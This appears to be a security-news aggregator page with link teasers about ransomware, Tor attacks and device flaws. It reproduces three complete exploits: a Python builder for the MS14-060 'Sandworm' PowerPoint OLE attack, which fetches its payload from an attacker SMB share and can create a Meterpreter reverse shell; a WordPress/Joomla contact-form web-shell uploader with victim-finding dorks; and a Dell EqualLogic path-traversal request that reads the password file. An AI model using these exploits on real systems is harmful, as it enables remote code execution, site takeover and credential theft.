Android Koler is a family of ransomware that targets Android users by locking up their mobile devices and demanding a ransom. It is believed to be the mobile extension of the Reveton ransomware family. Ransomware has been a profitable venture in the PC world with the likes of Crytolocker, but is a relative newcomer on mobile devices, at least in part due to file restrictions in mobile operating systems which limit the ability of apps to access the full file system. Despite this fact, the mobile market is clearly one that ransomware operators would like to tap into and Koler is a step in that direction.

more here............http://research.zscaler.com/2014/10/android-ransomware-koler-learns-to.html

Title:
        Windows NT 6.X OLE package manager remote code execution through
        MS Office Powerpoint XYZ slideshow (ppts, pptxs).
 
    EID:
        00000217:2013/06/10

    Description:
        Undocumented features exist in Windows NT 6 OLE package  manager.
        These features allow to bypass 'Safe download' mechanism     from
        untrusted sources and to execute imm.    The IContextMenu  i-face
        is used by 3-rd party software (such as MS Office Powerpoint XYZ)
        to unpack and dispatch package data. Shell action to be   applied
        to package is specified by action id in 'cmd' parameter of  slide
        xml-based document. Action Id '-1' and '-2' are reserved by    MS
        Office Powerpoint engine. Currently, silent '.inf'   installation
        is used for mitigation bypass.  The  MS Office    for  Windows XP
        contains internal OLE Package interpreter,  so Windows XP doesn't
        affected.
        Hi F-5ecure and E5et!   We  are offering  you  to patch holes and
        backdoors in your fucking AV-s. We know about them.


more here............http://pastebin.com/7N0PdF3f


and here


# !/usr/bin/python
# Windows OLE RCE Exploit MS14-060 (CVE-2014-4114) – Sandworm
# Author: Mike Czumak (T_v3rn1x) - @SecuritySift
# Written: 10/21/2014
# Tested Platform(s): Windows 7 SP1 (w/ exploit script run on Kali Linux)
# You are free to reuse this code in part or in whole with the exception of commercial applications
# For a demo of this PoC, see http://www.securitysift.com/windows-ole-rce-exploit-ms14-060/

import sys, os
import zipfile
import argparse
import subprocess
from shutil import copyfile
from pptx import Presentation
 
# Args/Usage
def get_args():
 
    parser = argparse.ArgumentParser( prog="ms14_060.py",
                                      formatter_class=lambda prog: argparse.HelpFormatter(prog,max_help_position=50),
                                      epilog= '''This script will build a blank PowerPoint show (ppsx) file to exploit the
                                      OLE Remote Code Execution vulnerability identified as MS14-060 (CVE-2014-4114)
                                          Simply pass filename of resulting PPSX and IP Address of remote machine hosting the
                                          share. You can add content to the PPSX file after it has been created.
                                      The script will also create the INF file and an optional Meterpreter
                                          reverse_tcp executable with the -m switch. Alternatively, you can host your own exectuble payload.
                                      Host the INF and GIF (EXE) in an SMB share called "share".
                                      Note: Requires python-pptx''')
 
    parser.add_argument("filename", help="Name of resulting PPSX exploit file")
    parser.add_argument("ip", help="IP Address of Remote machine hosting the share")
    parser.add_argument("-m", "--msf", help="Set if you want to create Meterpreter gif executable. Pass port (uses ip arg)")
    args = parser.parse_args()
 
    return args
 
 
# write file
def write_file(filename, contents):
    f = open(filename, "w")
    f.write(contents)
    f.close()
 
# build bin
def build_bin(embed, ip, share, file):
 
    bin = "\xD0\xCF\x11\xE0\xA1\xB1\x1A\xE1" # ole header
    bin = bin + "\x00" * 16
    bin = bin + "\x3E\x00\x03\x00\xFE\xFF\x09\x00"
    bin = bin + "\x06\x00\x00\x00\x00\x00\x00\x00"
    bin = bin + "\x00\x00\x00\x00\x01\x00\x00\x00"
    bin = bin + "\x01\x00\x00\x00\x00\x00\x00\x00"
    bin = bin + "\x00\x10\x00\x00\x02\x00\x00\x00"
    bin = bin + "\x01\x00\x00\x00\xFE\xFF\xFF\xFF"
    bin = bin + "\x00\x00\x00\x00\x00\x00\x00\x00"
    bin = bin + "\xFF" * 432
    bin = bin + "\xFD\xFF\xFF\xFF\xFE\xFF\xFF\xFF"
    bin = bin + "\xFE\xFF\xFF\xFF\xFE\xFF\xFF\xFF"
    bin = bin + "\xFF" * 496
    bin = bin + "\x52\x00\x6F\x00\x6F\x00\x74\x00"
    bin = bin + "\x20\x00\x45\x00\x6E\x00\x74\x00"
    bin = bin + "\x72\x00\x79\x00\x00\x00\x00\x00"
    bin = bin + "\x00" * 40
    bin = bin + "\x16\x00\x05\x00\xFF\xFF\xFF\xFF"
    bin = bin + "\xFF\xFF\xFF\xFF\x01\x00\x00\x00"
    bin = bin + "\x02\x26\x02\x00\x00\x00\x00\x00"
    bin = bin + "\xC0\x00\x00\x00\x00\x00\x00\x46"
    bin = bin + "\x00" * 12
    bin = bin + "\xF0\x75\xFD\x41\x63\xB2\xCF\x01"
    bin = bin + "\x03\x00\x00\x00\x40\x00\x00\x00"
    bin = bin + "\x00\x00\x00\x00\x01\x00\x4F\x00"
    bin = bin + "\x4C\x00\x45\x00\x31\x00\x30\x00"
    bin = bin + "\x4E\x00\x61\x00\x74\x00\x69\x00"
    bin = bin + "\x76\x00\x65\x00\x00\x00\x00\x00"
    bin = bin + "\x00" * 36
    bin = bin + "\x1A\x00\x02\x01"
    bin = bin + "\xFF" * 12
    bin = bin + "\x00" * 40
    bin = bin + "\x37"
    bin = bin + "\x00" * 75
    bin = bin + "\xFF" * 12
    bin = bin + "\x00" * 116
    bin = bin + "\xFF" * 12
    bin = bin + "\x00" * 48
    bin = bin + "\xFE"
    bin = bin + "\xFF" * 511
    bin = bin + "\x33\x00\x00\x00" + embed + "\x00" # 3   EmbeddedStgX.txt
    bin = bin + "\x5C\x5C" + ip + "\x5C" + share + "\x5C" + file # \\ip\share\file  
    bin = bin + "\x00" * 460
    return bin

# build ppt/drawings/vmlDrawing1.vml  
def build_vml():
    xml = '<xml xmlns:v="urn:schemas-microsoft-com:vml" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:p="urn:schemas-microsoft-com:office:powerpoint" xmlns:oa="urn:schemas-microsoft-com:office:activation">'
    xml = xml + '<o:shapelayout v:ext="edit"><o:idmap v:ext="edit" data="1"/></o:shapelayout><v:shapetype id="_x0000_t75" coordsize="21600,21600" o:spt="75" o:preferrelative="t" path="m@4@5l@4@11@9@11@9@5xe" filled="f" stroked="f">'
    xml = xml + '<v:stroke joinstyle="miter"/><v:formulas><v:f eqn="if lineDrawn pixelLineWidth 0"/><v:f eqn="sum @0 1 0"/><v:f eqn="sum 0 0 @1"/><v:f eqn="prod @2 1 2"/><v:f eqn="prod @3 21600 pixelWidth"/><v:f eqn="prod @3 21600 pixelHeight"/><v:f eqn="sum @0 0 1"/>'
    xml = xml + '<v:f eqn="prod @6 1 2"/><v:f eqn="prod @7 21600 pixelWidth"/><v:f eqn="sum @8 21600 0"/><v:f eqn="prod @7 21600 pixelHeight"/><v:f eqn="sum @10 21600 0"/></v:formulas>'
    xml = xml + '<v:path o:extrusionok="f" gradientshapeok="t" o:connecttype="rect"/><o:lock v:ext="edit" aspectratio="t"/></v:shapetype><v:shape id="_x0000_s1026" type="#_x0000_t75" style="position:absolute; left:100pt;top:-100pt;width:30pt;height:30pt"><v:imagedata o:relid="rId1" o:title=""/></v:shape><v:shape id="_x0000_s1027" type="#_x0000_t75" style="position:absolute; left:150pt;top:-100pt;width:30pt;height:30pt">'
    xml = xml + '<v:imagedata o:relid="rId2" o:title=""/></v:shape></xml>'
    return xml
 
 # build ppt/slides/_rels/slide1.xml.rels
def build_xml_rels(ole1, ole2):
    xml = '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
    xml = xml + '<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="../embeddings/' + ole1 + '"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="../embeddings/' + ole2 + '"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/vmlDrawing" Target="../drawings/vmlDrawing1.vml"/></Relationships>'
    return xml
 
def build_xml_slide1():
    xml = '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
    xml = xml + '<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main"><p:cSld><p:spTree><p:nvGrpSpPr><p:cNvPr id="1" name=""/><p:cNvGrpSpPr/><p:nvPr/></p:nvGrpSpPr><p:grpSpPr><a:xfrm><a:off x="0" y="0"/><a:ext cx="0" cy="0"/><a:chOff x="0" y="0"/><a:chExt cx="0" cy="0"/></a:xfrm></p:grpSpPr><p:graphicFrame><p:nvGraphicFramePr><p:cNvPr id="4" name="Object 3"/><p:cNvGraphicFramePr><a:graphicFrameLocks noChangeAspect="1"/></p:cNvGraphicFramePr><p:nvPr/></p:nvGraphicFramePr><p:xfrm><a:off x="1270000" y="-1270000"/><a:ext cx="381000" cy="381000"/></p:xfrm><a:graphic><a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole"><p:oleObj spid="_x0000_s1026" name="Packager Shell Object" r:id="rId3" imgW="850320" imgH="686880" progId=""><p:embed/></p:oleObj></a:graphicData></a:graphic></p:graphicFrame><p:graphicFrame><p:nvGraphicFramePr><p:cNvPr id="5" name="Object 4"/><p:cNvGraphicFramePr><a:graphicFrameLocks noChangeAspect="1"/></p:cNvGraphicFramePr><p:nvPr/></p:nvGraphicFramePr><p:xfrm><a:off x="1905000" y="-1270000"/><a:ext cx="381000" cy="381000"/></p:xfrm><a:graphic><a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole"><p:oleObj spid="_x0000_s1027" name="Packager Shell Object" r:id="rId4" imgW="850320" imgH="686880" progId=""><p:embed/></p:oleObj></a:graphicData></a:graphic></p:graphicFrame></p:spTree></p:cSld><p:clrMapOvr><a:masterClrMapping/></p:clrMapOvr><p:transition><p:zoom/></p:transition><p:timing><p:tnLst><p:par><p:cTn id="1" dur="indefinite" restart="never" nodeType="tmRoot"><p:childTnLst><p:seq concurrent="1" nextAc="seek"><p:cTn id="2" dur="indefinite" nodeType="mainSeq"><p:childTnLst><p:par><p:cTn id="3" fill="hold"><p:stCondLst><p:cond delay="indefinite"/><p:cond evt="onBegin" delay="0"><p:tn val="2"/></p:cond></p:stCondLst><p:childTnLst><p:par><p:cTn id="4" fill="hold"><p:stCondLst><p:cond delay="0"/></p:stCondLst><p:childTnLst><p:par><p:cTn id="5" presetID="11" presetClass="entr" presetSubtype="0" fill="hold" nodeType="withEffect"><p:stCondLst><p:cond delay="0"/></p:stCondLst><p:childTnLst><p:set><p:cBhvr><p:cTn id="6" dur="1000"><p:stCondLst><p:cond delay="0"/></p:stCondLst></p:cTn><p:tgtEl><p:spTgt spid="4"/></p:tgtEl><p:attrNameLst><p:attrName>style.visibility</p:attrName></p:attrNameLst></p:cBhvr><p:to><p:strVal val="visible"/></p:to></p:set></p:childTnLst></p:cTn></p:par></p:childTnLst></p:cTn></p:par><p:par><p:cTn id="7" fill="hold"><p:stCondLst><p:cond delay="1000"/></p:stCondLst><p:childTnLst><p:par><p:cTn id="8" presetID="11" presetClass="entr" presetSubtype="0" fill="hold" nodeType="afterEffect"><p:stCondLst><p:cond delay="0"/></p:stCondLst><p:childTnLst><p:set><p:cBhvr><p:cTn id="9" dur="1000"><p:stCondLst><p:cond delay="0"/></p:stCondLst></p:cTn><p:tgtEl><p:spTgt spid="4"/></p:tgtEl><p:attrNameLst><p:attrName>style.visibility</p:attrName></p:attrNameLst></p:cBhvr><p:to><p:strVal val="visible"/></p:to></p:set><p:cmd type="verb" cmd="-3"><p:cBhvr><p:cTn id="10" dur="1000" fill="hold"><p:stCondLst><p:cond delay="0"/></p:stCondLst></p:cTn><p:tgtEl><p:spTgt spid="4"/></p:tgtEl></p:cBhvr></p:cmd></p:childTnLst></p:cTn></p:par></p:childTnLst></p:cTn></p:par><p:par><p:cTn id="11" fill="hold"><p:stCondLst><p:cond delay="2000"/></p:stCondLst><p:childTnLst><p:par><p:cTn id="12" presetID="11" presetClass="entr" presetSubtype="0" fill="hold" nodeType="afterEffect"><p:stCondLst><p:cond delay="0"/></p:stCondLst><p:childTnLst><p:set><p:cBhvr><p:cTn id="13" dur="1000"><p:stCondLst><p:cond delay="0"/></p:stCondLst></p:cTn><p:tgtEl><p:spTgt spid="5"/></p:tgtEl><p:attrNameLst><p:attrName>style.visibility</p:attrName></p:attrNameLst></p:cBhvr><p:to><p:strVal val="visible"/></p:to></p:set><p:cmd type="verb" cmd="3"><p:cBhvr><p:cTn id="14" dur="1000" fill="hold"><p:stCondLst><p:cond delay="0"/></p:stCondLst></p:cTn><p:tgtEl><p:spTgt spid="5"/></p:tgtEl></p:cBhvr></p:cmd></p:childTnLst></p:cTn></p:par></p:childTnLst></p:cTn></p:par></p:childTnLst></p:cTn></p:par></p:childTnLst></p:cTn><p:prevCondLst><p:cond evt="onPrev" delay="0"><p:tgtEl><p:sldTgt/></p:tgtEl></p:cond></p:prevCondLst><p:nextCondLst><p:cond evt="onNext" delay="0"><p:tgtEl><p:sldTgt/></p:tgtEl></p:cond></p:nextCondLst></p:seq></p:childTnLst></p:cTn></p:par></p:tnLst></p:timing></p:sld>'
    return xml

# build [Content_Types].xml
def build_xml_content_types():
    xml = '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
    xml = xml + '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"><Default Extension="xml" ContentType="application/xml"/><Default Extension="jpeg" ContentType="image/jpeg"/><Default Extension="bin" ContentType="application/vnd.openxmlformats-officedocument.presentationml.printerSettings"/><Default Extension="vml" ContentType="application/vnd.openxmlformats-officedocument.vmlDrawing"/><Default Extension="rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/><Default Extension="wmf" ContentType="image/x-wmf"/><Override PartName="/ppt/presentation.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideshow.main+xml"/><Override PartName="/ppt/slideMasters/slideMaster1.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideMaster+xml"/><Override PartName="/ppt/slides/slide1.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/><Override PartName="/ppt/presProps.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.presProps+xml"/><Override PartName="/ppt/viewProps.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.viewProps+xml"/><Override PartName="/ppt/theme/theme1.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/><Override PartName="/ppt/tableStyles.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tableStyles+xml"/><Override PartName="/ppt/slideLayouts/slideLayout1.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/><Override PartName="/ppt/slideLayouts/slideLayout2.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/><Override PartName="/ppt/slideLayouts/slideLayout3.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/><Override PartName="/ppt/slideLayouts/slideLayout4.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/><Override PartName="/ppt/slideLayouts/slideLayout5.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/><Override PartName="/ppt/slideLayouts/slideLayout6.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/><Override PartName="/ppt/slideLayouts/slideLayout7.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/><Override PartName="/ppt/slideLayouts/slideLayout8.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/><Override PartName="/ppt/slideLayouts/slideLayout9.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/><Override PartName="/ppt/slideLayouts/slideLayout10.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/><Override PartName="/ppt/slideLayouts/slideLayout11.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/><Override PartName="/ppt/embeddings/oleObject1.bin" ContentType="application/vnd.openxmlformats-officedocument.oleObject"/><Override PartName="/ppt/embeddings/oleObject2.bin" ContentType="application/vnd.openxmlformats-officedocument.oleObject"/><Override PartName="/docProps/core.xml" ContentType="application/vnd.openxmlformats-package.core-properties+xml"/><Override PartName="/docProps/app.xml" ContentType="application/vnd.openxmlformats-officedocument.extended-properties+xml"/></Types>'
 
    return xml
   
# build remotely hosted inf file
def build_inf(gif):
    exe = gif.split('.')[0] + '.exe'
    inf = '[Version]\n'
    inf = inf + 'Signature = "$CHICAGO$"\n'
    inf = inf + 'Class=61883\n'
    inf = inf + 'ClassGuid={7EBEFBC0-3200-11d2-B4C2-00A0C9697D17}\n'
    inf = inf + 'Provider=%Microsoft%\n'
    inf = inf + 'DriverVer=06/21/2006,6.1.7600.16385\n'
    inf = inf + '[DestinationDirs]\n'
    inf = inf + 'DefaultDestDir = 1\n'
    inf = inf + '[DefaultInstall]\n'
    inf = inf + 'RenFiles = RxRename\n'
    inf = inf + 'AddReg = RxStart\n'
    inf = inf + '[RxRename]\n'
    inf = inf + exe + ', ' + gif + '\n'
    inf = inf + '[RxStart]\n'
    inf = inf + 'HKLM,Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce,Install,,%1%\\' + exe
 
    return inf

# build blank pptx file with python-pptx  
def build_presentation(filename):
    prs = Presentation()
    slide_layout = prs.slide_layouts[6] # blank slide
    slide = prs.slides.add_slide(slide_layout)
    prs.save(filename)
    return

# build metasploit meterpreter reverse_tcp payload
def build_msfpayload(ip, port, file):
    cmd = 'msfpayload windows/meterpreter/reverse_tcp LHOST=%s LPORT=%s X > %s' % (ip, port, file)
    run_cmd= subprocess.check_output(cmd, shell=True)
    subprocess.call(run_cmd, shell=True)
    print '[*] Meterpreter Reverse TCP EXE [%s] created.' % (file)
 
   
#################################################
###############        Main       ###############
#################################################
 
def main():
    print
    print '============================================================================='
    print '|    PowerPoint OLE Remote Code Execution (MS14-060 | CVE-2014-4114)        |'
    print '|               Author: Mike Czumak (T_v3rn1x) - @SecuritySift              |'
    print '=============================================================================\n'
   
    args = get_args() # get the cl args
    ip = args.ip
    share = "share"
    ole1 = "oleObject1.bin"
    ole2 = "oleObject2.bin"
    vml = "vmlDrawing1.vml"
    pptx = "tmp.pptx"
    gif = "slide1.gif"
    inf = "slides.inf"
   
    # build meterpreter reverse tcp gif file (optional)
    if args.msf:
        print "[i] Building metasploit reverse_tcp executable"
        build_msfpayload(args.ip, args.msf, gif)
 
    # build the bin, inf and vml files
    gif_bin = build_bin("EmbeddedStg1.txt", ip, share, gif)
    inf_bin = build_bin("EmbeddedStg2.txt", ip, share, inf)
    draw_vml = build_vml()
    rem_inf = build_inf(gif)
    write_file(inf, rem_inf)
    print ("[*] INF file [%s] created " % inf)
 
    # build the xml files
    xml_rel = build_xml_rels(ole1, ole2)
    xml_slide1 = build_xml_slide1()
    xml_content = build_xml_content_types()
 
    # build blank temp pptx presentation to convert to ppsx
    build_presentation(pptx)
    zippptx = pptx + ".zip"
    os.rename(pptx, zippptx) # rename to zip for modification
   
    # open temp pptx and a copy for modification
    zin = zipfile.ZipFile(zippptx, 'r')
    zippptx_copy = "copy_" + zippptx
    zout = zipfile.ZipFile(zippptx_copy, "w")
 
    # modify the pptx template with exploit
    for item in zin.infolist():
        if (item.filename == "ppt/slides/slide1.xml"):
            zout.writestr(item, xml_slide1) # replace slide 1 contents
        elif (item.filename == "ppt/slides/_rels/slide1.xml.rels"):
            zout.writestr(item, xml_rel) # replace slide 1 rels
        elif (item.filename == "[Content_Types].xml"):
            zout.writestr(item, xml_content) # replace content_types
        else:
            buffer = zin.read(item.filename)
            zout.writestr(item,buffer) # use existing file
   
    zout.writestr("ppt/embeddings/" + ole1, gif_bin)
    zout.writestr("ppt/embeddings/"+ole2, inf_bin)
    zout.writestr("ppt/drawings/vmlDrawing1.vml", draw_vml)
    zout.close()
    zin.close()
   
    # convert to ppsx
    os.rename(zippptx_copy, args.filename)
    os.remove(zippptx)
   
    print ("[*] Exploit PPSX file [%s] created" % (args.filename))    
    print ("[i] Place INF and GIF (EXE) payload file (called %s) in an SMB share called 'share'" % (gif))      
    print
 
if __name__ == '__main__':
    main()

#!/usr/bin/python
#
# Exploit Name: Wordpress and Joomla Creative Contact Form Shell Upload Vulnerability
#               Wordpress plugin version: <= 0.9.7
#               Joomla extension version: <= 2.0.0
#
# Vulnerability discovered by Gianni Angelozzi
#
# Exploit written by Claudio Viviani
#
# Dork google wordpress:  inurl:inurl:sexy-contact-form
# Dork google joomla   :  inurl:com_creativecontactform
#
# Tested on BackBox 3.x
#
# http connection
import urllib, urllib2, sys, mimetypes
# Args management
import optparse
# file management
import os, os.path

# Check url
def checkurl(url):
    if url[:8] != "https://" and url[:7] != "http://":
        print('[X] You must insert http:// or https:// procotol')
        sys.exit(1)
    else:
        return url

# Check if file exists and has readable
def checkfile(file):
    if not os.path.isfile(file) and not os.access(file, os.R_OK):
        print '[X] '+file+' file is missing or not readable'
        sys.exit(1)
    else:
        return file
# Get file's mimetype
def get_content_type(filename):
    return mimetypes.guess_type(filename)[0] or 'application/octet-stream'

# Create multipart header
def create_body_sh3ll_upl04d(payloadname):

   getfields = dict()

   payloadcontent = open(payloadname).read()

   LIMIT = '----------lImIt_of_THE_fIle_eW_$'
   CRLF = '\r\n'

   L = []
   for (key, value) in getfields.items():
      L.append('--' + LIMIT)
      L.append('Content-Disposition: form-data; name="%s"' % key)
      L.append('')
      L.append(value)

   L.append('--' + LIMIT)
   L.append('Content-Disposition: form-data; name="%s"; filename="%s"' % ('files[]', payloadname))
   L.append('Content-Type: %s' % get_content_type(payloadname))
   L.append('')
   L.append(payloadcontent)
   L.append('--' + LIMIT + '--')
   L.append('')
   body = CRLF.join(L)
   return body

banner = """


  ___ ___               __                            __,-,__                                
 |   Y   .-----.----.--|  .-----.----.-----.-----.   |  ' '__|                              
 |.  |   |  _  |   _|  _  |  _  |   _|  -__|__ --|   |     __|                              
 |. / \  |_____|__| |_____|   __|__| |_____|_____|   |_______|                              
 |:      |    _______     |__|             __           |_|                                  
 |::.|:. |   |   _   .-----.-----.--------|  .---.-.                                        
 `--- ---'   |___|   |  _  |  _  |        |  |  _  |                                        
             |.  |   |_____|_____|__|__|__|__|___._|                                        
             |:  1   |                                                                      
             |::.. . |                                                                      
             `-------'    
  _______                  __   __                 _______             __              __
 |   _   .----.-----.---.-|  |_|__.--.--.-----.   |   _   .-----.-----|  |_.---.-.----|  |_  
 |.  1___|   _|  -__|  _  |   _|  |  |  |  -__|   |.  1___|  _  |     |   _|  _  |  __|   _|
 |.  |___|__| |_____|___._|____|__|\___/|_____|   |.  |___|_____|__|__|____|___._|____|____|
 |:  1   |       _______                          |:  1   |                                  
 |::.. . |      |   _   .-----.----.--------.     |::.. . |                                  
 `-------'      |.  1___|  _  |   _|        |     `-------'                                  
                |.  __) |_____|__| |__|__|__|                                                
                |:  |                                                                        
                |::.|                                                                        
                `---'                                                                        
                                                                                             

                                                     Cr3ative C0nt4ct Form Sh3ll Upl04d

                                     Discovered by:
                                   
                                    Gianni Angelozzi

                                      Written by:

                                    Claudio Viviani

                                 http://www.homelab.it

                                    info@homelab.it
                                homelabit@protonmail.ch

                            https://www.facebook.com/homelabit
                              https://twitter.com/homelabit
                            https://plus.google.com/+HomelabIt1/
                   https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww
"""

commandList = optparse.OptionParser('usage: %prog -t URL -c CMS-f FILENAME.PHP [--timeout sec]')
commandList.add_option('-t', '--target', action="store",
                  help="Insert TARGET URL: http[s]://www.victim.com[:PORT]",
                  )
commandList.add_option('-c', '--cms', action="store",
                  help="Insert CMS Type: wordpress|joomla",
                  )
commandList.add_option('-f', '--file', action="store",
                  help="Insert file name, ex: shell.php",
                  )
commandList.add_option('--timeout', action="store", default=10, type="int",
                  help="[Timeout Value] - Default 10",
                  )

options, remainder = commandList.parse_args()

# Check args
if not options.target or not options.file or not options.cms:
    print(banner)
    commandList.print_help()
    sys.exit(1)

payloadname = checkfile(options.file)
host = checkurl(options.target)
timeout = options.timeout
cmstype = options.cms

print(banner)

if options.cms == "wordpress":
   url_sexy_upload = host+'/wp-content/plugins/sexy-contact-form/includes/fileupload/index.php'
   backdoor_location = host+'/wp-content/plugins/sexy-contact-form/includes/fileupload/files/'

elif options.cms == "joomla":
   url_sexy_upload = host+'/components/com_creativecontactform/fileupload/index.php'
   backdoor_location = host+'/components/com_creativecontactform/fileupload/files/'

else:
   print("[X] -c options require: 'wordpress' or 'joomla'")
   sys.exit(1)

content_type = 'multipart/form-data; boundary=----------lImIt_of_THE_fIle_eW_$'

bodyupload = create_body_sh3ll_upl04d(payloadname)

headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
           'content-type': content_type,
           'content-length': str(len(bodyupload)) }

try:
   req = urllib2.Request(url_sexy_upload, bodyupload, headers)
   response = urllib2.urlopen(req)

   if "error" in response.read():
      print("[X] Upload Failed :(")
   else:
      print("[!] Shell Uploaded")
      print("[!] "+backdoor_location+options.file)
except urllib2.HTTPError as e:
   print("[X] Http Error: "+str(e.code))
except urllib2.URLError as e:
   print("[X] Connection Error: "+str(e.code))



//The information contained within this publication is
//supplied "as-is"with no warranties or guarantees of fitness
//of use or otherwise. Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information

# Exploit Title: Remote Directory Traversal exploit for Dell EqualLogic 6.0
Storage
# Date: 09/2013
# Exploit Author: Mauricio Pampim Corr�a
# Vendor Homepage: www.dell.com
# Version: 6.0
# Tested on: Equipment Model Dell EqualLogic PS4000
# CVE : CVE-2013-3304



The malicious user sends



GET //../../../../../../../../etc/master.passwd







And the Dell Storage answers



root:[hash] &:/root:/bin/sh
daemon:*:[hash]::0:0:The devil himself:/:/sbin/nologin
operator:*:[hash]::0:0:System &:/usr/guest/operator:/sbin/nologin
bin:*:[hash]::0:0:Binaries Commands and Source:/:/sbin/nologin
sshd:*:[hash]:0:0:SSH pseudo-user:/var/chroot/sshd:/sbin/nologin
uucp:*:[hash]:UNIX-to-UNIX
Copy:/var/spool/uucppublic:/usr/libexec/uucp/uucico
nobody:*:[hash]:Unprivileged user:/nonexistent:/sbin/nologin
grpadmin:[hash]:Group Manager Admin Account:/mgtdb/update:/usr/bin/Cli
authgroup:[hash]:Group Authenication Account:/:/sbin/nologin





More informations in (Br-Portuguese) https://www.xlabs.com.br/blog/?p=50



Could obtain shell with flaw? send me an email telling me how, to
mauricio[at]xlabs.com.br



Thanks



//The information contained within this publication is
//supplied "as-is"with no warranties or guarantees of fitness
//of use or otherwise. Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information

Two new attacks on Tor were recently announced.

The first involves using an exit node to automatically modify software patches to include malware. This one is being seen in the wild already.

more here...........http://www.theprivacyblog.com/security-breaches/two-new-attacks-tor/

A very well known Brazilian comedy site, “Porta dos Fundos,” was recently hacked and is pushing malware (drive-by-download) via a malicious Flash executable

more here...............http://blog.sucuri.net/2014/10/popular-brazilian-site-porta-dos-fundos-hacked.html

While doing some research for Bankdroid during the hot summer days I decided to take a look at the increasingly popular payment app Swish. Swish, developed by HiQ for Sweden's six major banks (Danske Bank, Handelsbanken, Länsförsäkringar Bank, Nordea, SEB and Swedbank/Sparbankerna), lets its users send and receive instant payments without the hassle of bank transfers.

more here............http://blog.nullbyte.eu/open-curtains-in-swish-payments-service/

Developers nas and proxima have extended the recently released Vita Webkit exploit, and made it compatible with the latest PS4 firmware, firwmare 1.76. (Update: Proxima actually clarified that although this is the same webkit exploit, it was developed in parallel to the Vita exploit, and not “based” on it)

Their proof of concept code provides several samples, including a module dumper and some tool to create more advanced ROP code.


more here.............http://wololo.net/2014/10/24/webkit-exploit-confirmed-to-run-on-ps4-firmware-1-76/

Samsung FindMyMobile is a mobile web-service that provides samsung users different features to locate lost device, lock a device remotely so that no one else can use the device, or to play an alert on a remote device.

The Remote Controls feature on Samsung mobile devices does not validate the source of lock-code data received over a network, which makes it easier for remote attackers to cause a denial of service (screen locking with an arbitrary code) by triggering unexpected Find My Mobile network traffic.

more here.........http://0xicf.wordpress.com/2014/10/25/zero-day-hole-found-in-samsung-findmymobile-cve-2014-8346/

Imagine, somewhere in the internet that no-one trusts, there is a piece of hardware, a small computer, that works just for you. You can trust it. You can depend on it. Things may get rough but it will stay there to get you through. That is Nikka, it is the fixed point on which you can build your security and trust

more here...........https://www.lightbluetouchpaper.org/2014/10/26/nikka-digital-strongbox-crypto-as-service/

In this paper, we discuss the method of Bayesian regression and its efficacy for predicting price variation of Bitcoin, a recently popularized virtual, cryptographic currency. Bayesian regression refers to utilizing empirical data as proxy to perform Bayesian inference. We utilize Bayesian regression for the so-called "latent source model". The Bayesian regression for "latent source model" was introduced and discussed by Chen, Nikolov and Shah (2013) and Bresler, Chen and Shah (2014) for the purpose of binary classification. They established theoretical as well as empirical efficacy of the method for the setting of binary classification.
In this paper, instead we utilize it for predicting real-valued quantity, the price of Bitcoin. Based on this price prediction method, we devise a simple strategy for trading Bitcoin. The strategy is able to nearly double the investment in less than 60 day period when run against real data trace.


more here............http://arxiv-web3.library.cornell.edu/pdf/1410.1231v1.pdf

When we last left off, we were setting the stage for sharing what the Interns found in a handful of "IOT" or internet connected devices they purchased. So we'll be starting with a simple one. One that only required simple techniques to compromise it. This first device is a "Smart"-Home Controller. For a bit of background on what's going on here, please see "Part One" of this series

more here............http://www.xipiter.com/musings/the-insecurity-of-things-part-two

